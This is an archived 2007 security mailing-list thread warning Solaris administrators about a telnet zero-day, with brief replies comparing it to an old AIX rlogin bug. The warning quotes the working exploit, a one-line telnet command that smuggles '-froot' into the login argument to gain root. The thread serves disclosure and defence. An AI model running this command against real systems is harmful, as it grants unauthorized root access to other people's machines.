[Dshield] Solaris Telnet 0-day (Important!)

Gadi Evron ge at linuxbox.org
Mon Feb 12 03:11:23 GMT 2007


On Sun, 11 Feb 2007, Brendan Dolan-Gavitt wrote:
> WOW that's a stupid hole :) The same bug was found in rlogin in AIX
> sometime around 1994  (see
> http://www.cert.org/advisories/CA-1994-09.html for details). If
> Solaris 10 & 11 are truly vulnerable to this bug, Sun deserves a
> *swift* kick to the head.

Yeah, they still come with telnet installed?

> 
> -Brendan
> 
> On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> >
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > telnet 0-day.
> >
> > telnet -l "-froot" [hostname]
> >
> > will give you root on many Solaris systems with default installs
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> >
> >
> >
> > --
> > ---------
> > Johannes Ullrich                        http://isc.sans.org
> >
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> >         Register Today! <http://www.sans.org/info/2501>
> > (Brochurecode: ISC)
> >
> > PGP Key: https://secure.dshield.org/PGPKEYS
> >
> >
> > _________________________________________
> >
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> > Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> >
> >
> _________________________________________
> 
> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.
> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
> 



More information about the list mailing list